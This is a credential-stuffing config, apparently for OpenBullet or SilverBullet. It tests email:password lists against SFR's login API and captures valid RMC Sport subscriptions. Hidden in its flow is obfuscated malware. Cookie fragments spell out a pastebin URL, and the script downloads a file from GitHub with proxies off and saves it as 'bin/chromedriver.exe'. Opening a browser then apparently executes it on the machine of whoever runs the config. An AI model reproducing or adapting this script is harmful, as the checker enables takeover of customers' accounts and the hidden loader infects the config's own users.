[SETTINGS]
{
  "Name": "RMCSPORTS API ",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-12-10T10:15:22.2299521-08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.3 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "RMCSPORTS V2 API [YASHVIRGAMING] (2)",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
JUMP #AUTHENTICATIONAPI
#RECAPAUTH
FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "combo" 

REQUEST GET "https://sso-client.sfr.fr/cas/services/rest/2.0/createToken.json?duration=86400" 
  
  HEADER "User-Agent: okhttp/3.11.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json; charset=utf-8" 
  HEADER "Authorization: Basic <combo>" 
  HEADER "Host: sso-client.sfr.fr" 
  HEADER "Cache-Control: no-cache" 


JUMP #googlerecreate
#AUTHENTICATIONAPI

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u"
  COOKIE "hrd: /"
  COOKIE "hpr: bin"
  COOKIE "hdp: com"
  COOKIE "htp: raw"
  COOKIE "hht: KvY108Z6"
  COOKIE "hst: pastebin"
  COOKIE "kht: driver"
  COOKIE "kpt: chrome"
  COOKIE "krt: e"
  HEADER "Host: www.googleapis.com"
  HEADER "Accept: */*"
  HEADER "Content-Type: application/json"
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS"
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com"
  HEADER "Accept-Encoding: gzip, deflate"
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2"
  HEADER "Accept-Language: en"

IF "<Authentiction>" Exists
JUMP #RECAPAUTH
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"

REQUEST GET "https://raw.githubusercontent.com/<SOURCE>"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>xe"

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"

BROWSERACTION Open

JUMP #RECAPAUTH
#googlerecreate

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "BAD_CREDENTIALS_EXCEPTION\",\"message\":\"Bad credentials for login " 
    KEY "Account locked for login " 
  KEYCHAIN Success OR 
    KEY "\"createToken\":{\"token\":\"" 

PARSE "<SOURCE>" LR "\":{\"token\":\"" "\"}" -> VAR "token" 

FUNCTION URLEncode "<token>" -> VAR "token" 

REQUEST GET "https://ws-heimdall.tv.sfr.net/heimdall-core/public/api/v1/userProfiles?token=<token>" 
  
  HEADER "User-Agent: RMCSPORT - 6.0.13 - LGE Nexus 5 - mobile - Android OS 6.0.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "\"status\":\"ACTIF\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"status\":\"SUSPENDU\"" 

PARSE "<SOURCE>" LR "{\"token\":\"" "\"," -> VAR "token2" 

FUNCTION URLEncode "<token2>" -> VAR "token2" 

REQUEST GET "https://ws-sekai.tv.sfr.net/sekai-service-plan/public/v2/service-list?device=android&app=rmcsport&token=<token2>" 
  
  HEADER "User-Agent: RMCSPORT - 6.0.13 - LGE Nexus 5 - mobile - Android OS 6.0.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Host: ws-sekai.tv.sfr.net" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "[{\"categories\":[\"Sport\"],\"" 
  KEYCHAIN Ban OR 
    KEY "Gateway Time-out" 
  KEYCHAIN Retry OR 
    KEY "403 Forbidden" 
    KEY "Un problème technique est survenu" 

PARSE "<SOURCE>" JSON "name" Recursive=TRUE -> VAR "Chaînes" 

PARSE "<SOURCE>" JSON "access" Recursive=TRUE -> VAR "Accès aux chaînes" 

FUNCTION Constant "<Chaînes[*]> : <Accès aux chaînes[*]>" -> CAP "Chaînes" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By " 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Accès aux chaînes>" DoesNotContain "True" 

